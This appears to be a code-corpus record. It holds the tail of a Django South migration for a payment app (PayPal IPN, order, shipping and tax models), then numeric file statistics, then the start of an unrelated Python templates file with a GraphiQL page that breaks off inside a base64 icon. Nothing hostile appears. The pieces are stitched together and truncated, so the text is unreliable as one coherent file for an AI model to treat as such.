'decimal_places': '16', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'flag_code': 
('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}), 'flag_info': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'for_auction': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'from_view': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}), 'handling_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'initial_payment_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'invoice': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'ipaddress': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'blank': 'True'}), 'item_name': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'item_number': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'mc_amount1': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_amount2': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_amount3': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_currency': ('django.db.models.fields.CharField', [], {'default': "'USD'", 'max_length': '32', 'blank': 'True'}), 'mc_fee': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 
'decimal_places': '2', 'blank': 'True'}), 'mc_gross': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_handling': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'mc_shipping': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'memo': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'next_payment_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'notify_version': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'num_cart_items': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}), 'option_name1': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'option_name2': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'outstanding_balance': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'parent_txn_id': ('django.db.models.fields.CharField', [], {'max_length': '19', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '24', 'blank': 'True'}), 'payer_business_name': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'payer_email': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'payer_id': ('django.db.models.fields.CharField', [], {'max_length': '13', 'blank': 'True'}), 'payer_status': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}), 'payment_cycle': ('django.db.models.fields.CharField', [], {'max_length': '32', 
'blank': 'True'}), 'payment_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'payment_gross': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'payment_status': ('django.db.models.fields.CharField', [], {'max_length': '9', 'blank': 'True'}), 'payment_type': ('django.db.models.fields.CharField', [], {'max_length': '7', 'blank': 'True'}), 'pending_reason': ('django.db.models.fields.CharField', [], {'max_length': '14', 'blank': 'True'}), 'period1': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'period2': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'period3': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'period_type': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'product_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'product_type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'profile_status': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'protection_eligibility': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'quantity': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}), 'query': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'reason_code': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}), 'reattempt': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}), 'receipt_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'receiver_email': ('django.db.models.fields.EmailField', [], {'max_length': '127', 'blank': 'True'}), 'receiver_id': ('django.db.models.fields.CharField', [], {'max_length': '127', 
'blank': 'True'}), 'recur_times': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}), 'recurring': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}), 'recurring_payment_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'remaining_settle': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'residence_country': ('django.db.models.fields.CharField', [], {'max_length': '2', 'blank': 'True'}), 'response': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'retry_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'rp_invoice_id': ('django.db.models.fields.CharField', [], {'max_length': '127', 'blank': 'True'}), 'settle_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'settle_currency': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}), 'shipping': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'shipping_method': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'subscr_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'subscr_effective': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'subscr_id': ('django.db.models.fields.CharField', [], {'max_length': '19', 'blank': 'True'}), 'tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '64', 'decimal_places': '2', 'blank': 'True'}), 'test_ipn': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'time_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 
'transaction_entity': ('django.db.models.fields.CharField', [], {'max_length': '7', 'blank': 'True'}), 'transaction_subject': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'txn_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '19', 'blank': 'True'}), 'txn_type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'verify_sign': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}) }, 'order.order': { 'Meta': {'ordering': "('-created',)", 'object_name': 'Order'}, 'account_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'bank_identification_code': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'bank_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'customer_email': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'customer_firstname': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'customer_lastname': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'depositor': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'ia_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'order_invoice_address'", 'to': "orm['contenttypes.ContentType']"}), 'ia_object_id': ('django.db.models.fields.PositiveIntegerField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'message': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'number': ('django.db.models.fields.CharField', [], {'max_length': 
'30'}), 'pay_link': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'payment_method': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['payment.PaymentMethod']", 'null': 'True', 'blank': 'True'}), 'payment_price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'payment_tax': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'requested_delivery_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'sa_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'order_shipping_address'", 'to': "orm['contenttypes.ContentType']"}), 'sa_object_id': ('django.db.models.fields.PositiveIntegerField', [], {}), 'session': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'shipping_method': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shipping.ShippingMethod']", 'null': 'True', 'blank': 'True'}), 'shipping_price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'shipping_tax': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'state': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}), 'state_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'tax': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}), 'uuid': ('django.db.models.fields.CharField', [], {'default': "'cb38c15b-66b9-48ad-bae2-1013ef3dd5e8'", 'unique': 'True', 'max_length': '50'}), 'voucher_number': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'voucher_price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'voucher_tax': ('django.db.models.fields.FloatField', [], {'default': '0.0'}) }, 
'payment.paymentmethod': { 'Meta': {'ordering': "('priority',)", 'object_name': 'PaymentMethod'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'deletable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), 'module': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'note': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tax': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tax.Tax']", 'null': 'True', 'blank': 'True'}), 'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}) }, 'payment.paymentmethodprice': { 'Meta': {'ordering': "('priority',)", 'object_name': 'PaymentMethodPrice'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'payment_method': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'prices'", 'to': "orm['payment.PaymentMethod']"}), 'price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'payment.paypalordertransaction': { 'Meta': {'object_name': 'PayPalOrderTransaction'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'ipn': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['ipn.PayPalIPN']", 'symmetrical': 'False'}), 'order': ('django.db.models.fields.related.ForeignKey', 
[], {'to': "orm['order.Order']", 'unique': 'True'}) }, 'shipping.shippingmethod': { 'Meta': {'ordering': "('priority',)", 'object_name': 'ShippingMethod'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'delivery_time': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.DeliveryTime']", 'null': 'True', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'note': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'price': ('django.db.models.fields.FloatField', [], {'default': '0.0'}), 'price_calculator': ('django.db.models.fields.CharField', [], {'default': "'lfs.shipping.GrossShippingMethodPriceCalculator'", 'max_length': '200'}), 'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tax': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tax.Tax']", 'null': 'True', 'blank': 'True'}) }, 'tax.tax': { 'Meta': {'object_name': 'Tax'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'rate': ('django.db.models.fields.FloatField', [], {'default': '0'}) } } complete_apps = ['payment']
90.311321
182
0.572966
3,000
28,719
5.357
0.092333
0.112999
0.196876
0.281252
0.812644
0.785701
0.759629
0.703565
0.632755
0.552735
0
0.016925
0.177095
28,719
318
183
90.311321
0.663098
0.012152
0
0.149153
0
0
0.579387
0.319946
0
0
0
0
0
1
0.00678
false
0.00678
0.013559
0
0.033898
0
0
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
cba74f9e105b75a00a08a2712a2cef3aad59c716
27,448
py
Python
frux_app_server/templates.py
camidvorkin/frux-app-server
21098234a7867908250022e3e1c0580417d1ca35
[ "Apache-2.0", "MIT" ]
3
2021-08-03T21:52:01.000Z
2021-09-14T19:39:10.000Z
frux_app_server/templates.py
camidvorkin/frux-app-server
21098234a7867908250022e3e1c0580417d1ca35
[ "Apache-2.0", "MIT" ]
null
null
null
frux_app_server/templates.py
camidvorkin/frux-app-server
21098234a7867908250022e3e1c0580417d1ca35
[ "Apache-2.0", "MIT" ]
null
null
null
"""Templates for pages.""" GRAPHIQL_TEMPLATE = """<!-- The request to this GraphQL server provided the header "Accept: text/html" and as a result has been presented GraphiQL - an in-browser IDE for exploring GraphQL. If you wish to receive JSON, provide the header "Accept: application/json" or add "&raw" to the end of the URL within a browser. --> <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>{{graphiql_html_title}}</title> <meta name="robots" content="noindex" /> <meta name="referrer" content="origin" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link href="data:image/x-icon;base64,AAABAAEAAAAAAAEAIACXQgAAFgAAAIlQTkcNChoKAAAADUlIRFIAAAEAAAABAAgGAAAAXHKoZgAAAAFvck5UAc+id5oAAEJRSURBVHja7V0HeBzVtV5I4SMkefCerWIcQnGw5RZIIHQIAV4gPRBeCEiWjCtgg1zBVcWF5oppBmNsbGOruVvuvfcud/Uu2epd2vvuf/fOarTWzM5KW2Zm7/2+P3KMvDvlnnNP/Y/FIpbuVuCyMEvwpiGWoPg+Cgi7gf68heJ2it4Uz1CEUYyimEaxiCKZYg/FaYp0inyKEopqijqKRgorRyP/u2r+O/jdDIoUiv0U6/lnTuPf0YfiOf7dnSl+GpQQfqPS9f7XvAhLYFy4eLFiieW4bl39L0swFY7WBCcwvg8E/WcU91A8QRFOMYniO4ptFGcpcinKuABDmImHge+opyjn3w0lsYMrCFxbX4qn+DX/PMh2D60pMcsvVvQXG0AsfzvdX7UEJURQAWgp9MG2n7dwwXmBn7QLKPZSZFFUeknA3YEqfs37ubIaTfEnil8xa8FBGfB7t3RaFiE2iFjmWwGyTe4AnO69KF6lmEWxkyKTotYggu4KcE/Z/B4/4S4LXIifBzo8l04JfSwdlwmXQSwDL5i4ty9/xVHgf0RxN8WL3J+Gj15I0WRCgXeGJn7vsHBmUPyLP5sfyZ9ZwNJQS1BcH7GhxDKC0NOTfmWEo9D/hOI+iiEUiRRp3IcmAi3QwIOVyymGUtzPn539Wf4k6Z/sp1hi6Ufo41o172+m+C334zfyk04IuWsoothM8S7FA47KgAVJE4QyEMsHKxhpOpz2CbJAXlyfH9Cf3fhJj7RZsRBitwHPcgPF2xQhFD+UPXeGTolCGYjl4dUxPrS1QF5H7tMv4pFvIbCeBQKJiyle4s++5ftIFMFDsdxt5ifyk8aenw/Dad+TYhzFEZ6DF8LpXeCZH6WYwDMpP7CnFePgHoSJjStWO0197mc6BPRQdTefF8EIQdQHcnnNxHO8loK9r87LXoeyFhtZLBcFPyHCcuuS/5ML/q0U/+bltRVC4HSLCh5/eYXiNun9deQ/xRJLdQWyYNJrjv59f4rdwsw3nHuAGosBFAF2123xK5agBBEjEOu6Ez+MNas4CP5AioO8UUYIlTGBd3eIYrBcEaBIC6XYYvn9iR/mGNGHqR9BccBPq/PMXHV4kDcq3day4SpCCIK/rU6Joa0V7iCVt11U6Zm+2nAHLzu+ucUeEL0HfpLSQ4oozt5ueyNvs03kvfBCSPwDeNdJFE/S/XBjs1sgAoXmNfcTQ1vk8im6UMwUFXt+jau8C7NLC7dAWAMmWtHRrbXgIih0XgiAAAf2whucwMS+VyzxL
wv5MfIKiAuzBPNCno6L2c/HKdZyX1BsfAHH+MA67JGA5a82k5WIikKD+vrX1+tHURSIjS7gBOjcjHbsMxDLiIIfF3EDL93dITa2gIsAc9EzgcuaOQ2DRRGRoU79/6aYKIJ8Au1sQ47ie0lYA3pdt8UPdCSY/B3vH7eKTSzgBhbkjXxP2ffZHUteFYKnhxXcslvvJl7/nSk2roCbkcnLw2+SlxSL5WOTX0bHhSEZc03KqCugH2bjuXyvoZCMQSwvr07f/8fR33+EYpfYoAJeArpDH5FzQQbQPSmWF5YDLdcP+JgqYfIL+MIl6BMoYyLqlBghBNSjJ3/LaTqo6IsVBB0CPkQlH4fWXEEoZiB6KNgXH2bplGBv3+3MiSFFy66AHlqNl/A9aQkUqUJPBPvC7N1afJzUNrHxBHSG7Xxv2unKxXJ/cc/TFGfEZhPQKc7wPSqKhtwq/Ctft3Ae+AyxyQQMEBz8V8D3Qgm4R/gTWC12P1HSK2CwEuL+gXayEaEE2mr2YwRUJEW52FQCBkM537s/FEqgbcL/Y4qxgqpLwODUY+P4XhZKwAXhv4l3YYmyXgEzlA9Hy3sIxFL3+W/iBT5iEIeAmQaVxAol4PTkD/8xP/mF8AuYUQlECXdAQfgDbcGSscLsFzC5OzBOBAav9/lv5BFTEfAT8IfA4LDg+DD/ThFKNdOdkiLws79I9Qn4WYqwf6e4CG79hvnbyR9mr5fmFX6iyEfAH4uFXgpmHa5hjNjGP07+uHCm8WS1/aKXX8Cfy4ZZ78DtsAbM3krcqSWZR2/R2CMgwGTA3kV4+zKTWgIBLWm8OvP2SbEBBARsstC5WT76mjri/zNO5iFevIBAMxZz2TBfZkCW6/8Br4gSTD4CAtczC8UGyTgGzSH8CS14/PpwHjXxwgUErkcFlxE75b2hF6anBLWk7hYRfwEB55mBRyS5wdQrM/j9GKSwW7xcAQFN2M1lxriugENr71zxUgUEXMJcw3YPBrXk7x8gGnwEBNrUODQgyIgEo7KL/p3w+wUE2oyMINlUYqMJP2aqbxQvUUCgXdjAZUn/SqBTgjQj7XUw+U4Mss1WFy9RQKDtgAxN7LA07IYgXY8ei462t/hSPCM6/AQE3No5+IzdCoh/Wdemf0eKneKlCQi4FTu4bLH2YZ21+NqIDQKW9MXPaPGyBAQ8guiAuJdtfBqJr+mQ4CO+z+MUBeJFCQh4BJCtx3QVEAxKsJv+mJG+VrwkAQGPYq1uugbRrBCYaFcAb1A0iBckIOBRQMYGB3FKveDEUF0E/rpQnBcvR0DAKzjPZc53VkAwN/35BNRZ4qUICHgVMwPjwhm1eEB8qE9P/ydFzl9AwCe1AU/4xAoIbg783UyRJF6GgIBPkMhl0BLszdqAwDi7AgCnv5jmIyDgG1RzGWQduN4W/luDBLOvgICvsZ3LIivF9/jqnGTn9u8r0n4CArpIC0ZAJjvHRXjY949rUe9/UE8PIjA+jATGhZEAhlDS0QkCGMJs/05sIgFj44BX+gRuWfOapAAGBXmZ2huCCoGF8HaIe40BQhwcH07uSHyd/GrFINJ79VDy4LoR5MkNY8j/bp5I/rI1lvxj+xTy4vb3GfDnP9O/e27zBPLEhvfIb9cOI91XvUXuSupPbk+IYJ8v/2x8p9hcAgYAZHGgLRjoIRLRwIQwr53+ckHHz05UOCHgEO4/bYkh/fZ+QsYfX0w+Pb+WJKbvJdvzTpFjV6+QS+W5JLuqmBTVlpGy+ipS2VBLqhvrSA0H/lzZUENK6ypJYU0pyawsIimlmWRf4TmyOusgmXtxAxl3bBEJ3T2dPEWVSLeVb9DvDrdbDUIhCOgYBz1qBdy+JELO8dfo3pM91H7q4jS/b807TNCHHPySzExZRVZmHmACnkWFu7y+mjRam4gnV31TA1MiJ6+lMQUzgSqbv2+bzKwFXHMHKIM4oQwEdAXIZH9mBcS97rHT/zaKPe0VeOl0x//Hyf77jWPJoP2fkTnn1
pItuSfIlYo8JuhWq5XoZVVQy+FMSQb59vIW0nfvbPLr1W+z2IHNMhAbUEAX2MNllE3g9kTw7xWKuraY9B140O2e5QPJ0xvHkaEH5zJhOlJ8mZ22nj7V3W0hnC/LJl9eWM8sgzuT+gkXQUAPqOMy6r66AIwr5sJ/C8V6bad8H37Kh7LgGoJt4Xtmks/OryP7i84zgW/S0enenlVGLZWNOcdI/31zmDUjFIGAjwEZ/UkQ4+Z0Q1pQVvP/bJBtdpmq0AN3JQ0gf6Cn/OijC8gq6r+nVRSQOnpqmnnh/nYXnCUD9n1K7l4+gD0HsRkFfIAKLqvt7xEIWGYv+sHE0m+VTfxQtun/sW0K+ejMciYIxfSU9/SCFYHI/rW6CpJVVcTM8qPUpcD3b8o9TlZnHSLLM/azQF5ixl6ygv55XfZhFmdA5B9BvtSKfFJYU0aqGmrdYpXUNtaTDdQi+Of2KSxFGSCChQLex3wus9QK6OOW078XRW6rJz/d4H/cHEU25RxngTJPna5I250tzWSCPf/SFhJ7chl548Dn5KUd7zNr48G1w0mPVW+RLtQM/yX1yX+R2Je5H0jjQRAB/Bl/94vE11nuv+uKwSzjgJoA1Ai8eeALpsCgNKAcrtZWECtpm1K4SpUS0pS/XvO2sAYEvI1cLrPtswKCmxXAeKXg3gPUvz9Vku42Ya9tqic51VfJgaILZNGV7SwF9+quaUxIu696kwmvPJPQXNknVfWFEa1xCqm4SKocbK47CGc1AM9sGk/ePvQVWZK6k1kXuDZXF4Kc/975kT0DIjangJcwvl0KIKhl4c/R1r4EAoNTuK2nJBaKdS6W5TBzfcqpeCbsDyePJPdQl0L6jg68dNebAiRXMrAeUGUYtnsG+e7KNpJeWeCaNUAtiUkn45ibJFwCAS/hqL0wKKFPW07/cHnLb52SAnjn0Ncu+8hXqN+9hgp81InvmekN4YJpLmUObKe5vh5oIE9lQhn8bt0IVjF49OplzelL/N6ytN3CJRDwZkrwxTZbAbLg32KlL8FG/uvWSaxoRzlQ10SKa8vJ3sJzZFbKKvIfesLfvyaSdE7o21xia7BTUSpV7r7yTRJJFSAUgVYraEf+afLY+neFEhDwBhZJwcC2Bv+6UWSrmcnIfe8vPK+44Xfmn2G+tM38bfbXzfCAJTeh56ohJObEUpJRWahJCUBhIHAplICAh5HFZZgV87lQ+ms3/4c6+xJs4qgTSxQ3+7nSLGriv82E36wPWmpDRklzUsY+VinobCHL8LRQAgKexxDI8q1J4S5bADdrqfyDYD9OTVpE7pVy9SMOf+MXGx33eGdSf/Lu0QUkt/qaUyVwuPgSeSR5lKmVo4AuKgNv1uwGyMz/3wZpZPtFu+7StF2KG31XwVnWA+APaTAptfi3bZNZB6OztTXvJOm1eqjIDgh4CsVclrVRhnVsjv6PduXkQ/oOVXmtLVTZ/WfXx35l7uJeH1o3kvUJOFuLr2xnloOoExDwEEZBpjskhGu2ANBMsMmVU89ZMDA+fQ9L9fnTg4cS6LV6CKssVFsNTY1k4okloq1YwFPYJDUIqdf+N0/5vZ+iyNXNPubYd4rJMHQAPrdpgt8FveDfo4JxhRMlUFRTxmjLRFBQwAOALN8H2e6oNkWokwvR/9bLgoczMg+lhdp4fzRzA5glMJRszj2hqgQOFl0Q8QABj2YDOqkxB3Ph/1FQG6f9wIRFz7/SQufdQ+tG+OUGx8mOiP+Ja6mqSmBWympWbSg2rICbkcRlWyH4t8zO+Xc3RXpbNznYeNVagdHF569pLzwflD7nV5eo9A2Uk79vmyJcAQF3I43LNnX1I1o7/cPktf9tHvjROSGCJKTvUdzgp0syWO2/v5Jq4r7fO7pQtVgImQN/SZsKeA319t6AhFBVBTCjvacc2l/R5adUGDTyyHy/PeEg1Ej5oWJQjXPwrYNfCiugDfUXHWWt3XLIh8GwZjP7EBn1f9fBXINkpgfFhbNOXyX//
+cUe9v3Ivowsg21gBcq4NBv768nHDbUUxvHkHSV3oEj9BmBhlxYAcpt2h14izg4IkDuAu5J9Fj8c/tUErFnFuNyGHvsO9aKPe3sChaEBpHr1xc3km8ubSbzLm5isyC+uJBMZqesJh+eSWIuKiw0kNaC/fn/dn5IXtgSbR8kg317Jx8k43gtUmObjhUEWIN/dl0c4K44+8Sf3hSF7tjgA/bNUeQBRN57iJ+fcDhNQHaiREOGLkp/tpQcOy+lATHowHx641hGMht9Yiljh9qce5z1VmDQC+jhqhtrSYO1sV08Ffi3aOFG+zq6XZGmRbMXqOH3FKSwdnYoEXBYQFnA6kVvB+ji0fgmDZRptj7C9KDMCyWmoJ8v6ivL/zeTf4QGuWHkF270XqqRwbuntPDf8Dv+esLhvkPoZgbzkVrXIGoI/OkZBfK0aUfOKA3KNpzCk0/FkRWZ+5kAor28nh4iellQFlAUCOBeLs9jzNfgoITVAeUArkxwSHRZPpBleOSKwcvvFrL9mi0OEOZg/sexGoDZ7jRzYYJBEyv5uYMPfO7XJxzufeD+TxWpxvDs/CUWIJ304HPECf8uZ5SGQNUolJgbYUE5oBQeI+sOFV9kAfL3TyeQ1/d+wtwVHALNZDhemUk5O5gKf4u+gKBm3v+d7j7hwImntGBKecMKCJAFd/QkTLhvRPsx21BpbaP/DTTrgSb252EuP7p+NPO9wdgMlmazLyh3WAywaDCXEvGHiL2zyJMb3mMyEcwZtzxgJezgsn6dAujCCQTcesKhFViJNgtmHJh4PS2UeKiwRkBfhsnAYAzWywAPW7zkU8V4CZiWX9w+1VRWgCT48JX/j/rOS1J3sBPS3xdiY2C/Rhfp96k7WQATXaXos3Fj8VwWl3Ve/htn9///RFHr7heNSDZ8WaUFH9iTGQEoGPnmgv+4gpqWmAAMn8zXikCKl6jFAuZd2mQqwceGxixIWDdVCuli98+QaGJuJ3x1aVJ0lWx6NP4eB1KTzkbUYZo1aOSQiXCTEoCMv8DKgpeFWiw37BrucvuvO60A/P1wDxCG4GE9mjxakaYLLx48BUMOzmWBNl9SleG7Yf4qRa0x9hw8ikYuobZNjOrPRqjB9XPXpCjsH0TpoeRBTw9hQY3FVxc3ko/PLCfjji9i1h+sLLA6I6CIWRKoyMRcR6QM8f8Rxe+zZyb7Pfw+/h3McqQN4beDtwEnc1pFPjPda6jC8OZwO3z3fWvedlcBHWsPvmHNWAsbIhgcH34D/YuFnox2IwCitFAf38vN1YE2yvIvnKaC4IvBQhlzbCFL4fhCEeD7ECXGCDWla8SJ2cGAbgDuDf4sTNnk7CPspG2PsKOr9PjVVDbtaerpBBZExSh5PD9YkggiShOZlAqCWkMHxeKhMPZ5GFsPy+X+Ne+wIOXLOz5kLuX0sytYqzuU2mWqqJGG9ESGAvcO5SRN1W4nFgTHhd3A3ABZAdA+T2p/pEMaFB4MhBQU4QFuVgCDqdBoHfeFa0BAZsLxJSz1FOBltmIIyYLLWxWvD5TiCJYZkQ9hZsoq5nq1ZZXUVbLCMZzEUILgXYTL5Is8e2vVhh05VTysGxwgIMCFJQF+B0y/huWAoTJXWeqyfVZP5OF57lIA+7jM2xXAPe4OALbm52Jmn9KC9nRnpyA+58F1w9nDdy1tQ0hKaSYZf3wx61nwVowA3/Pa7umKJ+SV8jzDuAHShCbMRzxQdL5NQg9THocCxs7h5LXNZXjN6wNiXKlfCIy7vkoRlgNYo5Hygwsy8bhNMSDzg4E4sBgaNFgM+D3EAdzkKmdxmbcrgKcoqjy9wVFaqZbTnXNujdsbb16hvl1KaVab8renrqWRUUe+ZaalpxUBPhsb5WxJpu